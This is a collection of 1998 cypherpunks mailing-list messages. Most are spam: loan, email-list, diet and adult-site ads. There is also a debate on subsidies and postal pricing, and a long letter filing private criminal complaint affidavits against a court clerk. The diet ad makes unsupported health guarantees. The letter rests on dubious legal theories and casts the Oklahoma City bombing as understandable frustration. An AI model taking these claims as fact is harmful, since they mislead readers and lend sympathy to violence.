          Here's your chance to...

        > Eliminate Credit Card Debt!
        > Take advantage of LOW INTEREST RATES!
        > Escape from High Monthly Payments!
        > Get Relief and Have the Money You Need!
        > Cash in Your Pocket Usually within 7 to 14 days!
        > Make Home Improvements You've Always Wanted!
        > Take the Vacation You Deserve!

                        How?
  Simply http://www.frvnet.net/amcap/156.html CLICK HERE
           TO VISIT OUR WEBSITE!

--> if you were unable to reach our website, please
 http://www.mixmen.com/amcap/156.html  CLICK HERE!

Would you like money for...

            ~ A New Car?
            ~ College Tuition?
            ~ Taxes?
            ~ Consolidate Your Credit Cards?
            ~ A Dream Vacation?
            ~ Home Improvements?

             Now It Can Be Yours!
             What are you waiting for?

         For a FREE evaluation please visit our website by... 

         http://www.frvnet.net/amcap/156.html  CLICKING HERE

            -- if you were unable to reach our website, please
                 http://www.mixmen.com/amcap/156.html CLICK HERE!

or type or paste: http://www.frvnet.net/amcap/156.html
or http://www.mixmen.com/amcap/156.html into your browser

       Especially if you're a homeowner, we can help you.  Try us! 

     SAVE this message... you'll need it again in the near future!
     And if you still couldn't reach our website, please try again.  
     You should have no problem getting thru tomorrow!  Thanks!


To add your name to an industry-wide REMOVE LIST   http://remove-list.com CLICK HERE
(Remove List is a free public offering to help the general public get removed from bulk mailing lists
and has not sent this message.  Please add your name to their list and you will not receive a bulk email
from us or any other ethical bulk mailer.  We update our remove lists weekly.  If you receive duplicate mail
from us for a few days until we do our removal updates, please delete our messages.
WE APOLOGIZE for any inconvenience!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maree19@kola.dcu.ie (grynomu)
Date: Sun, 9 Aug 1998 05:11:04 -0700 (PDT)
To: maree19@kola.dcu.ie
Subject: direct-email-secrets & stumbling blocks
Message-ID: <199808092170RAA37702@gasuvo.crol.jkans.kais.kyoto-u.ac.jp>
MIME-Version: 1.0
Content-Type: text/plain



 REACH NEW PROSPECTS - WITHOUT THE TECHNICAL HASSLE !

 DO YOU KNOW HOW MOST DIRECT EMAILERS STUMBLE?

 Direct email uses similar principles involved in the familiar model 
 of direct postal mail. If done correctly, one's success is sure to 
 come. If not performed correctly, then it becomes a case of luck. 

 THE 4 BASIC PRINCIPLE OF DIRECT EMAIL:

 These basic steps are what the professional, consistent and
 successful direct emailers use. They are the foundation and root of
 the direct email model. These include the following:

  1. Consistently accessing new and fresh lists
  2. Consistently updating lists
  3. Consistently sending your ad at reasonable intervals
      (repetition is the key = look at TV commercials)
  4. Optimizing your ad and  subject to a more "order pulling" ad

 DO YOU KNOW AIDA?

 AIDA is an acronym of the model used in creating powerful and
 effective sales letters, which is widely used in advertising today.
 Grab one of several direct mail and direct email letters and read
 them. The effective letters follow AIDA. What's AIDA stand for?

       A    =    grab the prospect's "ATTENTION"
       I     =    create "INTEREST" by providing some information
       D    =    create stimulaton the produces "DESIRE"
       A    =    demand immediate "ACTION"

 Do you need current and supplemental prospect email lists ?
 Do you need fresh lists every day, every week or every month ?
 Do you need more new prospects - never reached before ?

 If you answered yes, our List Update Service will provide you
 NEW and FRESH email contacts.

 NEVER RUN OUT OF EMAIL PROSPECTS ! ! 
 __________________________________________

 MORE INFO (24 hrs): 626-839-3835 (US)
 __________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 11 Aug 1998 17:53:51 -0700 (PDT)
To: tzeruch@ceddec.com
Subject: [off topic] Re: I'm from the government, and I'm here to control , your email....
In-Reply-To: <98Aug11.125642edt.43010@brickwall.ceddec.com>
Message-ID: <Pine.BSF.3.91.980809234716.5856A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 11 Aug 1998 dontspam-tzeruch@ceddec.com wrote:

> On Sun, 9 Aug 1998, Rabid Wombat wrote:
> 
> > This is how it works in a free-market economy (doh!).
> > 
> > One of the self-appointed/assumed functions of gubbmint is to "fix" this, 
> > by granting some organization a monopoly in return for bearing the costs 
> > of creating infrastructure, as well as spreading the cost of servicing a 
> > (smaller) number of remote customers across a (larger) number of 
> > non-remote customers.
> > 
> > Whether this is a good thing(tm) or a bad thing(tm) depends, as usual, on 
> > which side of the subsidy you are on.
> 
> No, it can still be a bad thing even if I am the beneficiary.  The
> question is whether or not it maximizes efficiency.  A stock market crash
> will benefit the short sellers and owners of puts.  But it will also cause
> a depression, which will still affect the short sellers.

Yes, it can be a bad thing no matter which side you are on. Many 
subsidies are merely re-allocation of wealth, often from the rich to the 
poor. OTOH, some services, although not essential, are important enough 
to warrant a limited, regulated monopoly until sufficent scale has been 
reached to allow a competetive marketplace to be successful.

> There is a cross-subsidy.  The monopoly then pays the government to
> maintain the monopoly indefinately using government force to drive out
> competition.  Being able to legally imprison or shoot competitors is an
> advantage that is hard to overcome. 

Every organism seeks to propogate. It is the responsibility of the people 
to kill the monopoly when it has outlived its usefulness.

> Alaska tends to be cold.  Should heat and other forms of energy be
> subsidized, and roads built to wherever I want to place my cabin?  Arizona
> is dry - should they get subsidized water?

They do. What's your point? That this is unfair? Of course it is. Life is 
unfair. Some of these unfair subsidies by not be equitable in the short 
run, but in the long run, everybody comes out ahead. Others simply 
re-distribute wealth, to no long-term socialo benefit whatsoever. The 
difference between the two comes down to managing resources.

Some enterprises have traditionally been beyond the scale of the private 
sector, although that is really no longer the case. The US flourished due 
to the success of the railroad building in the late 1800's, and this 
success would not have been possible without a great deal of public 
assistance. True, the rich got richer, but in the long run, a more 
competitive marketplace evolved. The common person was, as a result, 
better off (at least from an economic perspective).

Eventually, the highway systems were government-subsidized, and the 
railroads were not. This helped GM and its shareholders to get rich, 
provided a lot of post-WWII manufacturing jobs, and created huge 
traffic problems and suburban sprawl. See post-WWII Los Angles as a 
reference.

> Why is distance different than any other factor.  If I want to live in a
> remote area, I should bear the costs of the remoteness, just as if I want
> to live near a river, I will have to bear the costs of flood control or
> damage from uncontrolled floods.  I don't have to live in a mountain
> cabin, but if I do there will be costs.

The government provides flood insurance for those who continue to build in
flood plains, and those of us who live on high ground continue to
subsidize this. I live on high ground, and peronally feel that providing
flood insurance to an area that washes out every 5-10 years is stupid. 
OTOH, it might be useful to provide such insurance for areas that only
wash out every 40-50 years. Where do you draw the line?  BTW- The
government funds "water-control" projects as well, subsidizing the
delivery of water to rural areas. Distance is just another cost factor,
one that happens to be pertinent to the process of delivering packages. 


> 
> The largest delay for consumer wireless has been government regulation
> itself - not allowing efficient use of bandwidth.  (I think the first cell
> phone was 1979).  And there was a CB craze, although it had limited range.
> The big wait was for the FCC to catch up with technology (or for congress 
> to allow them to do so).

This was only partially due to frequency regulation. Miniturization has 
had a lot to do with the recent growth in wireless as well. Back when 
cellular phones were the size of a small purse, they were slow to catch 
on; people who spent a good deal of time in their cars, or those whose 
employers subsidised status symbols had car phones, but growth was still 
fairly slow. Once the hand-helds appeared, growth accelerated. There had 
to be enough consumers to support the cost of adding infrastructure, and 
there had to be enough infrastructure to support the consumer; some 
industries can pull this off without outside help, and some cannot.

BTW - Australian cattle stations used radios as their primary link to the 
outside world for quite a while, due to their rural location; the same 
held true for many other "remote" corners of the globe. Not a very 
scalable solution, though. Try using a CB in a built-up area. Then 
imagine everyone getting home on Thursday after a long day at work, and 
trying to order pizza delivery at the same time on a CB in that same area.


> 
> > Before you argue "the best government is no government", visit a few 
> > third-world capitols, and note how you move from a modern capitol city to 
> > flintstones-like living in about 50km.
> 
> Many third world governments are thoroughly corrupt.  Across the border in
> Mexico they have "Government" - are you saying that Mexico City is better
> than Wyoming?  And the small villages have government even if they don't
> have technology.

My point is that many areas of the world have not invested in deploying
technology very far beynd the boundaries of a few "modern" cities. 
Without getting into an even longer rant here, the end result is to
perpetuate the cycle of rural poverty (look into some of the studies of
third-world economic development - distribution of technology and services
is often cited as a critical success factor). Those who do escape to the
city and manage to attain a higher socio-economic status remain there. The
bulk of those born to poverty have no hope of climbing out of it. 

In many countries, (including Mexico, since you mentioned it), delivering
telephone service to rural areas without wireless technology was not even
possible; the locals pull down the telephone (and power) wires to steal
the copper for re-sale. 

Basically, some groups just haven't managed to pull off effective 
self-government; in the long run, you get the form of government you deserve.
If you are too damn self-interested to see anything in terms of the 
common good, you'll probably end up with a self-interested government. 
Call it corrupt if you wish to, for it is, but don't confuse cause and 
effect.

> 
> > A $.32 price on first-class mail to anywhere in the country is a good 
> > deal for all. OTOH, package delivery has become sufficiently competitive, 
> > and probably needs to be revamped.
> 
> Generally wealthier people can afford to live in the remote areas, and can
> afford alternatives to first class mail.  Poor people rely on first class
> mail within cities to do much of their business, and that is mainly local. 
> So you have another case of the poor subsidizing the rich. 

I'm not sure where you've been, but not everybody who lives in a rural 
area is wealthy; this only occurs in places where space is at a premium, 
and only the wealthy can afford to purchase space. There are plenty of 
rural people who are dependant on first class postage to pay their bills, 
and they can't simply walk over to the corner grocer/food stamp 
launderer/check cashing/utlity bill collector to take care of business 
the way they can down on da block.

> 
> > Just my $.02.
> 
> No, your $0.32, soon to be more.
> 

At twice that, it is still a bargain, when you consider what you're 
getting for your money.

Actually, a good portion of the costs of first class delivery are 
subsidized by commercial bulk mailers, who are in turn supported by those 
who purchase goods and services found in direct mail advertisements. I 
suppose that you could even draw the conclusion that if one can afford to 
purchase goods, one is better off that one who cannot, and therefore the 
"haves", by subsidizing bulk mail, are bearing a share of the cost of 
first class delivery used by the "have nots."

Of course, we could argue economics for months - if you don't like the 
results, just change the assumptions.

-r.w.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcb@mylaptop.com
Date: Sun, 9 Aug 1998 09:10:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Sorry for the delay
Message-ID: <199808091609.BAA00017@ns2.daio-paper.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

This is the information you requested
http://internetmarketing.com.tj/

John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MariePhillips@counternet.com.centralnet.ch
Date: Mon, 10 Aug 1998 00:40:30 -0700 (PDT)
To: Friend@public.com
Subject: Marie Phillips
Message-ID: <199808100736.HAA18423@centralnet.ch>
MIME-Version: 1.0
Content-Type: text/plain


When not now, when? My whole life I was OVERWEIGHT and started dieting with 13 years. Since then I hungered, suffered and punished myself.
But I never lost more than a few pounds. After I started eating regularly I gained the pounds back or even more. You know what I am talking about, 'cause it
happened to you too! If you are not overweight (but 57% of the Americans are) delete this message. 

Eight months ago I started my new life, a healthy life. I finally lost all the fat and gained lean muscle mass. In fact, in 3 month I slashed my bodyfat more than in half and I am now down
to 12% (for women 10-13% is ideal) 

STOP DREAMING!!! They will never invent a miracle drug, which makes you loose all your fat. In fact, forget about the shakes, nasty soups, fat absorb pills, hours of Aerobic, hunger and
depression. You have to feed your body to lose fat. If you do not feed your body it will fight back and store the fat and you gain more. You don't believe me? You know it is true, it happened to you too.

I created a program with help from scientists and doctors to help all of YOU lose the fat for once and for all. You will eat more than ever but you have to use the plan! It is not
the meat and shrimp and fish what's bad for you but the carbohydrates. You can still eat your favorite food like steaks, fish, and chicken, vegetable etc.etc. You don't have to count
calories, that's not important. It is the way you eat and feed your body. But you will have to eat SIX times a day!

This program also lowers your bloodsugar, cholesterol level and bloodpressure in just 30 days. Again, you will lose fat guaranteed. If you are not seeing a change in and on your body and your friends don't 
react, and your spouse doesn't think you look terrific within 90 days, I will refund your money less S&H.

After you lost all the fat you wanted to get rid-off and send me a nice thank-you note with a picture "before and after" of you, I will send you a special gift.
The program includes also email address and my phonenumber, if you ever need help or have questions.

I have to charge you for the program otherwise you'll order it and put it away and forget about it. The booklet will be in stores late this year for 69.95. I give it to you for
ONLY 29.95. You have to order now, because there is only a limited quantity on hand. Send check to the following address. OR, print out this email, attach the check on the printout and fax it to 1 561 615 3717.

Name:___________________________________

Street:___________________________________

City:_____________________________________

Zip:_____________________________________

Phone:__________________________________ (optional) 



Print this email out, attach your personal or business check and fax it to: 1 561 615 3717



Or send it to: Marie Crystal
6901 W. Okeechobee Blvd
Suite D5, # 115
West Palm Beach, FL 33411





legal statement:

This message complies with the proposed United States Federal requirements for commercial email as well as the Washington State Commercial email bill Section 301, Paragraph (a) (2) (C) of s. 1618. To delete this message press the delete bottom on your browser. This is a one-time message.

sender: (above address, phone 561 615 9176)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tina&Rob@aladin.escp.fr
Date: Sun, 9 Aug 1998 15:38:23 -0700 (PDT)
To: Tina&amp;Rob@aladin.escp.fr
Subject: `
Message-ID: <199808092237.HAA14161@da4002.airex.co.jp>
MIME-Version: 1.0
Content-Type: text/plain





Hello!  Come See Our Naughty Little City 
Made Especially For Adults

http://208.26.207.98/freeweek/enter.html

Once You Get Here, 
You Won't Want To Leave!



We subscribe to and support responsible UCE guidelines as presented in
the "PROPOSED" bill on the regulation of commercial e-mail, Section 301
Sender Information:  Advanced Marketing Services, 1296 Cronson Blvd.  Ste.
4227,  Crofton, Md. 21114 - ph: 1-301-369-1587.          
Per Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions 
may be stopped at no cost to you. SEND REMOVE REQUEST TO:
Maxwell699@mymail.com with the word "remove" in the subject line.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 10 Aug 1998 07:04:08 -0700 (PDT)
To: newyork@fbi.gov
Subject: George Santyana & Great Satan
Message-ID: <35CEFCB6.2FEA@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Monday 8/10/98 6:58 AM

J Orlin Grabbe  http://www.aci.net/kalliste/
John Young  http://www.jya.com/crypto.htm

We must be cautious when doing battle with the Great Fascist Satan.

The Great Satan is capable of doing some REALLY TERRIBLE things.

For example,

  It's estimated 100,000 people died at Hiroshima on August 6, 1945. 
Seventy-
  five hours later, another 74,000 were killed a Nagasaki.  But these
figures
  only include  those who perished in the initial blasts.  Many more
people died soon 
  afterward from radiation sickness, and other would die years later
from leukemia,       pernicious anemia, and other radiation-related
diseases. Current estimates calculate the     total number deaths so far
from the two blasts at more than 340,000 people.

page 68

  Five days after Nagasaki was bombed, Japan submitted to the
unconditional surrender that     America was insisting on.  America's
conventional bombing of Japan continued right up until   surrender was
finalized, killing more than 15,000 people after the Nagasaki bombing.

page 70

  Weird History 101
  John Richard Stephens / Paperback / Published 1997

Then, of course, other unfortunate US government FACTION decisions have
surfaced. http://www.aci.net/kalliste/speccoll.htm
http://caq.com/cryptogate

Discovery of which involved the MfS

  Spymaster : The Real-Life 'Karla,' His Moles, and the East German
Secret Police 
  Leslie Colitt / Hardcover / Published 1995

We must recall the sequence of events in view of the tragic bombing in
Africa on Friday.

  1  bombing of the La Belle disco
  2  retaliatory bombing of Libya
  3  Pan Am 103

"Those who cannot remember the past are doomed to repeat it."
                                        -- George Santyana, 1905

http://rickohio.com/mag/articles/monica.htm

What has changed over time since the start of the La Belle sequence is
that the balance of high tech technology advantage has shifted to the
terrorists.  Cheap PCs, Internet, international electronic and software
knowledge, foreign undergraduate and graduate school training in the
US,  12 years of compulsory English in many foreign schools, ...

I am not very happy about NSA/Sandia TRYING to get me involved in their
FBI and NSA SECRET/NSI work.  I want my money and out of their messes.

I am going to push the Privacy Act criminal violation HARD.

Let's hope for settlement before things get WORSE.

Later 
bill


Friday 8/7/98  7:30 AM
 
Certified   Return receipt requested 
 
Proctor Hug  Jr 
Chief Judge, Ninth Circuit 
50 West Liberty Street 
Reno, NV 89501-1948 
(702) 784-5631 
784-5166 fax 
 
Dear judge Hug: 
 
Purposes of this letter- criminal complaint affidavit are to 
 
1 file a criminal complaint affidavits against Ninth circuit Senior Case Expeditor Gwen Baptiste for  
   Obstruction of Justice, 
 
2  ask why not have not yet done your job. 
 
On 4/1/98 I forwarded to you criminal complaint affidavits for proper processing. 
 
In a hand-addressed envelope stamped CONFIDENTIAL with return address 
 
              CLERK, U.S. COURT OF APPEALS 
	P.O. BOX 547 
	SAN FRANCISCO, CA 94101-0547 
 
	OFFICIAL BUSINESS 
	PENALTY FOR PRIVATE USE, 300 
 
postmarked  SAN FRANCISCO, CALIF  APR 24 98 U.S. POSTAGE $2.62 METER 504753 
some returned the complaints to me. 
 
On May 5, 1998 I received the ATTACHED letter which states 
 
  Re: Complaint of Judicial Misconduct 
 
  We have received your complaint of judicial misconduct or disability.  It is being returned to you for 
  failure to comply with the Rules of the Judicial Counsel of the Ninth Circuit Governing Complaints 
  of Judicial Misconduct or Disability (Rules).  See Rule 3(d). ... 
 
  xx_A copy of these Rules is enclosed.  To understand the purpose of the procedure and who may be 
  complained about, please refer to Rules 1 and 2. ... 
 
  xx  Statement of facts exceed five pages  See Rule 2(b). ... 
 
  xx  Other.  Please complete the complaint form and return sufficient copies.  See attached Rules for  
  guidance.   Your complaint can only be against Article Three Judges. 
 
				Very truly yours, 
 
				signature 
 
				Gwen Baptiste 
				Senior Case Expeditor 
 
Judge Hug,  I am NOT filing a COMPLAINT OF JUDICIAL MISCONDUCT. 
 
I am filing CRIMINAL COMPLAINT AFFIDAVITS in accordance with procedures set forth in law. 
 
Our forefathers designed the criminal law system with the possibility in mind that a cabal of lawyers 
might band together in an attempt to prevent prosecution of one or more friends. 
 
Therefore, if local federal officials will not do their duty and prosecute for criminal activity IN WRITING , 
then a citizen has the right to seek and select a magistrate from another district. 
 
Most individuals would interpret the letter 
 
                              U.S. Department of Justice  
                              United States Attorney  
                              District of New Mexico  
                              Post Office Box 607 
                              Albuquerque, New Mexico 87103  
                                                                 505/766 3341 
                                                                 505/766 2868 
                                                                          FAX 505/766-8517 
                              May 19, 1997  
 
 
  Mr. William A. Payne  
  13015 Calle de Sandia, NE  
  Albuquerque, New Mexico 87111  
 
  Dear Mr. Payne:  
 
     My name is Robert J. Gorence. I am the First Assistant U.S. Attorney and the Chief of the Criminal    
  Division for the United States Attorney's Office for the District of New Mexico. I am in receipt of your  
  February 13, 1997 letter to Judge Frank John McGill as well as your September 20, 1996 Request for  
  Examination of Report Filed by a Judicial Officer. In your letter to Judge McGill, you assert on 
  page 2, paragraph 4 that you have filed a "criminal complaint affidavit" with Judge Bunton. On page 4 you  
  accuse Judge Paul Kelly of a felony. On page 8 you assert that you are waiting receipt of an arrest warrant for  
  Judge Kelly.  
 
     I do not understand the basis of your assertions. However, I will tell you that any attempt by you to privately  
  execute any type of "arrest warrant," against any member of the federal judiciary would constitute a violation  
  of 18 U.S.C.  1201 - Kidnaping, a felony which carries a potential of life imprisonment. Also, attempts on  
  your part to file private "criminal complaint affidavits" or "arrest warrants" regarding members of the federal  
  judiciary would constitute a violation of 18 U.S.C.  111 - Impeding a Federal Officer in the 
  Performance of Their Official Duties. I trust you will take my warnings seriously and that you will cease this  
  obstreperous conduct. If you do not, federal criminal charges will be filed against you.  
 
     Sincerely,  
 
     [Signature]  
 
     ROBERT J. GORENCE  
     First Assistant U.S. Attorney  
 
RJG/maf 
 
http://www.jya.com/whprjg.htm 
 
as an indication that justice would not be forthcoming from the New Mexico District Attorney's Office. 
 
Therefore, I sought external relief. 
 
 First with Judge Fern Smith, District of Northern California  on March 11, 1996. 
 
Smith along with Albuquerque FBI agent-in-charge Thomas Knier sent FBI agents to our home to attempt to 
threaten me.  
 
Next I sought relief from  J. Clifford Wallace, chief judge,  Ninth Circuit Court of Appeals on  July 9, 1996. 
 
Wallace received a criminal complaint affidavit on Knier on July 15, 1996 for sending FBI agents in an 
attempt to threaten me. 
  
Ms. Corina Orozco,  Deputy Clerk., Ninth Circuit Court of Appeals wrote me 
 
             August 15, 1996 
 
             This court is in receipt of you letters dated July 15, 1996. 
 
             If you wish to file an appeal in this court and seek 
             judicial relief you must first file an action in the U.S. 
             District Court. 
 
NO, judge Hug, I was filing CRIMINAL COMPLAINT AFFIDAVITS. 
 
Gwen Baptiste from the Office of  the Clerk, United States Court of Appeals for The Ninth Circuit, 
wrote on July 25, 1996 
 
                  Re: Complaint of Judicial Misconduct 
 
             We have received your complaint of judicial misconduct. 
             Pursuant to the Rules of the Judicial Council of the Ninth 
             Circuit Governing Complaints of Judicial Misconduct or 
             Disability, you complaint is being returned to you for 
             compliance with the above rules.  A copy of these rules is 
             enclosed.  To understand the purpose of the procedure and 
             who may be complaint about please refer to Rules 1 and 2. 
 
AGAIN, judge Hug, I am filing CRIMINAL COMPLAINT AFFIDAVITS not COMPLAINTS OF JUDICIAL  
MISCONDUCT.   
 
Judge Hug, I hope it is FINALLY CLEAR that I am filing CRIMINAL COMPLAINT AFFIDAVITS as 
I am entitled to do by law. 
 
Judge Hug, THE DOCUMENTS YOU SHOULD HAVE IN YOUR POSSESSION and you can 
view on Internet at http://www.jya.com/snlhit.htm show 
 
1  Criminal violations of the Privacy Act http://www.jya.com/hr105-37.txt 
    ATTACHED 11 pages beginning with Sandia National Laboratories 
    director  Michael Robles writing EEOC Director Charles Burtner. 
 
    A  I never saw the documents until Sandia employee Richard Gallegos gave me a copy in 1997.  
    B  Sandia denied that the documents existed.   
    C  The documents contain factually incorrect information.  I did NOTHING WRONG.  I followed all        
         Sandia procedures known to me and obtained all required Sandia approvals.
    D  I was never given an opportunity to defend myself.  http://jya.com/greene.htm  
    E  Neither Sandia nor EEOC had my permission in writing for release  of the information.  
 
2  A ATTACHED PERJURED SWORN affidavit by Sandia attorney Gregory Cone submitted 
of the court of New Mexico judge John Conway. 
 
             AFFIDAVIT OF GREGORY A. CONE 
 
             Gregory A. Cone, being duly sworn, deposes and states: 
 
             1. I am employed by Sandia Corporation.  I am an attorney 
             admitted to practice law in the State of California and before the 
             U. S. Patent and Trademark Office and concentrate on legal issues 
             related to patent and copyright law.  In that capacity, I am  
             familiar with activities at the Sandia National Laboratories 
             ("Sandia") as they related to what is sometimes referred to as 
             "reverse engineering." ... 
 
              It is the general view at Sandia that disassembly of "object 
             code" under such circumstances constitutes a "fair use" of 
             copyrighted software under 17 U.S.C. article 107 and is thus 
             permissible.  Sandia bases its view on Sega Enterprises v. 
             Accolade, Inc. 977 F.2d 1510, 24 U.S.P. Q. 2d 1561 (9th Cir. 
             1992), amended, 1993 U. S. App. LEXIS 78, and Atari Games Corp 
             v. Nintendo of America, Inc, 975 F.2d 832 (Fed. Cir.  
             1992) ... 
 
             FURTHER, Affidavit sayeth naught. 
                                  
                                 (signed) 
                                GREGORY A. CONE. 
 
             SUBSCRIBED, SWORN TO and ACKNOWLEDGED before me on this 12th 
             day of August, 1993, by Gregory A. Cone." 
                                                 (signed) 
                                                Mary A. Resnick 
 
                                                Notary Public 
 
             My Commission Expires: 
 
             2-7-94 
 
Lawyer Cone has citations reversed.  The  U. S. Patent Quarterly references the Atari v Nintendo lawsuit.   
1510 should be corrected to 1015. 
 
Judge Fern Smith  ruled in both cases: 
 
                The first two cases to directly address the issue of 
                intermediate copying both originated in California's 
                Northern District Court.  They are Atari v. Nintendo and 
                Sega v. Accolade.  In both cases, the district court  
                found that intermediate copying was NOT fair use. ... 
  
                In a strong opinion she [Fern Smith] wrote in March 1991, 
                when granting Nintendo's request for a preliminary 
                injunction against Atari, she lambasted Atari's lawyers for 
                thievery.  ... 
 
                However, both cases have been overruled on appeal. In the 
                ground-breaking Atari decision, the Federal Circuit held 
                that intermediate copying was a fair use.  The Sega 
                decision, which was appealed to the Ninth Circuit Court of 
                Appeals, similarly overruled the district court and held 
                that intermediate copying may be fair use. 
 
        The New Use of Fair Use:  Accessing Copyrighted Programs Through  
        Reverse Engineering, Stephen B. Maebius, Journal of the Patent and  
        Trademark Office Society, June 1993, 75, n6, p433 
 
Cone's affidavit attempts to create the appearance that  reverse engineering  I REFUSED to do for the FBI was  
legal before July 27, 1992, the date of  my firing.  
 
Decision of the appeal was apparently Decided SEPTEMBER 10, 1992.  Page 1016 from 24 USPQ 2d, Atari  
Games Corp.  v. Nintendo of America.  I was fired JULY 27, 1992! 
 
Lawyer Cone has under oath knowingly made a false material declaration before a court.   
 
Judge Hug, we just can't get the arrest warrant issued for Cone YET.  Or for those who violated the criminal 
sections of the Privacy Act 
 
Judges and clerks who are apparently are reluctant to properly proceed against other federal or federal contract 
employee are themselves committing crimes. 
 
Judge Hug, there is ONE SET OF LAWS in the United States of America.  Not a set of laws which applies to 
ordinary citizens and another which apply to judges, clerks, federal and federal contract employees. 
 
Rule 3 of the Federal Rules of Criminal Procedure, entitled the Complaint provides: 
 
              The complaint is a written statement of the essential  
	facts constituting the offense charged.  It shall be made  
	upon oath before a magistrate. 
 
As you may be aware, 
 
             An individual may "make a written complaint on oath before  
	an examining and committing magistrate, and obtain a warrant  
	of arrest."  This is in conformity with the Federal  
	Constitution, and "consonant with the principles of natural  
	justice and personal liberty found in the common law." 
 
        [United States v Kilpatrick (1883, DC NC) 16G 765, 769] 
 
You may also be aware, 
 
            A complaint though quite general in terms is valid if it 
            sufficiently apprises the defendant of the nature of the 
            offense with which he is charged. 
 
        [United States v Wood (1927, DC Tex) 26F2d 908, 910, affd 
        (CA5 Tex) 26 F2d 912. 
 
And for your edification, 
 
        The commission of a crime must be shown by facts positively 
        stated.  The oath or affirmation required is of facts and 
        not opinions or conclusion. 
 
        [United States ex rel. King v Gokey (1929, DC NY) 32 F2d 
        793, 794] 
 
        The complaint must be accompanied by an oath. 
 
        [Re Rules of Court (1877, CC Ga) 3 Woods 502, F Cas No 
        12126] 
 
        A complaint must be sworn to before a commissioner or other 
        officer empowered to commit persons charged with offenses 
        against the United States. 
 
        [United States v Bierley ( 1971, WD Pa) 331 F Supp 1182] 
 
Such office is now called a magistrate. 
 
        A complaint is ordinarily made by an investigating officer 
        or agent, and where private citizens seek warrants of 
        arrest, the practice recommended by the Judicial Conference 
        of the United States is to refer the complaint to the United 
        States Attorney.  However, further reference to him is 
        rendered futile where a mandamus proceeding is brought to 
        compel him to prosecute and he opposes the proceeding. 
 
        [Pugach v Klein (1961, SD NY) 193 F Supp 630, citing Manual 
        for United States Commissioners 5 (1948)] 
 
Any attempt to bring criminal complaints to government authorities  
would, of course, be as evidenced by Gorrence's letter http://www.jya.com/whprjg.htm . 
 
I am a citizen of the United States and you are the assigned  
magistrate. 
 
        In order to satisfy the requirement of the Constitution  
        and Rules 3 and 4, a written and sworn complaint should set 
        forth the essential facts constituting the offense charged 
        and also facts showing that the offense was committed and 
        that the defendant committed it. 
 
And, 
 
        As to the requirement that the complaint be made on personal 
        knowledge of the complainant, it is enough for the issuance 
        of a warrant that a complainant shows it to be on the 
        knowledge of the complainant. 
 
        [Giordenello v United States (1958) 357 US 480, 2 L Ed. 2d 
        1503, 78 S Ct 1245, rev. (Ca5 Tx) 241 F2d 575, 579 in accord 
        Rice v Ames (1901) 180 US 371, 45 L Ed 577, 21 S ct 406, and 
        United States v Walker, (1952, CA2 NY) 197 F 2d 287, 289, 
        cert den 344 US 877, 97 L Ed 679, 73 S Ct 172] 
 
So as to keep contiguous the requirements of the law and the criminal  
complaint affidavits, I will include this complaint in this letter  
to you. 
 
CRIMINAL COMPLAINT AFFIDAVIT: Gwen Baptiste 
 
Essential material facts are: 
 
1 July 25, 1996 Gwen Baptiste improperly returns criminal complaint affidavits properly forwarded to  
Ninth Circuit judge J Clifford Wallace. 
 
2 May 5, 1998  Bapitist repeats return of criminal complaint affidavits properly sent to judge Proctor Hug  Jr. 
 
COUNT 1 
 
3  Ninth circuit Senior Case Expeditor Gwen Baptiste  is charged with REPEATED INTENTIONAL  
MACLIOUS Obstruction of Justice, 18 USC 1512, (b) and (c).  
 
Title 18 Obstruction of Justice, Article  1512, as amended, states 
 
             Tampering with a witness, victim, or an informant 
 
             (b) Whoever knowingly uses intimidation ...  
	     threatens, ... or engages in misleading conduct toward  
	     another person with intent to - 
 
             (3) hinder, delay or prevent the communication to a law 
             enforcement officer or judge of the United States of 
             information relating to the commission or possible 
             commission of a Federal offense ... 
 
             (c) Whoever intentionally harasses another person and  
	     thereby hinders, delays, prevents, or dissuades any  
	     person from -  
 
             (1) reporting to a law enforcement or judge of the United 
             States the commission or possible commission of a Federal 
             offense ... 
 
             or attempts to do so, shall be fined under this title or imprisoned ... 
				 
for Baptiste's TWO attempts to convince citizen Payne to file a judicial misconduct complaint 
when Payne was filing CRIMINAL COMPLAINT AFFIDAVITS. 
 
              VERIFICATION 
 
              Under penalty of perjury as provided by law, the  
	undersigned certifies pursuant to 28 USC section 1746  
	that material factual statements set forth in this  
	criminal complaint are true and correct, except as to  
	any matters therein stated to be information and belief  
	of such matters the undersigned certifies as aforesaid  
	that the undersigned verily believes the same to be true. 
 
 
 
 
             Date                     William H. Payne 
        			 13015 Calle de Sandias NE 
                                          Albuquerque, NM 87111 
                                          505-292-7037 
  
Judge Hug, many citizens are becoming disgusted with government misconduct.  Something must 
be done to correct this. 
 
One example is of government misconduct is how the Department of Justice handled the case of a citizen  
ACCUSED of a federal firearm violation. http://www.monumental.com/SkyWriter/WacoMuseum/ 
 
Displeasure with the way the government handled to bring the ACCUSED to justice led to an 
unfortunate display of dissatisfaction.  ARTICLES RELATED TO OKLAHOMA CITY BOMBING   
http://www.aci.net/kalliste/  
 
Tenth circuit court clerks and judges violated their own rules denying court wins to citizen Morales and 
myself.  Senator Orrin Hatch improperly processed a judicial misconduct complaint against New Mexico
judge John Conway. http://www.jya.com/whp071598.htm

These two acts mostly caused Morales and me AND OTHERS to reveal additional unfortunate decisions by
factions within the US government in the hope PROMPT SETTLEMENT will bring relief. 
http://www.aci.net/kalliste/speccoll.htm   http://caq.com/cryptogate  http://jya.com/whpfiles.htm   
 
We seeks changes within the law so as to avoid future citizen frustration of our government and legal system 
not working properly.   
 
And possible unacceptable, but understandable, future expressions of frustrations of government employees not  
obeying the law. 
 
WRITTEN EVIDENCE both in document copies and on Internet is so BLATANT that crimes have been  
committed. 
 
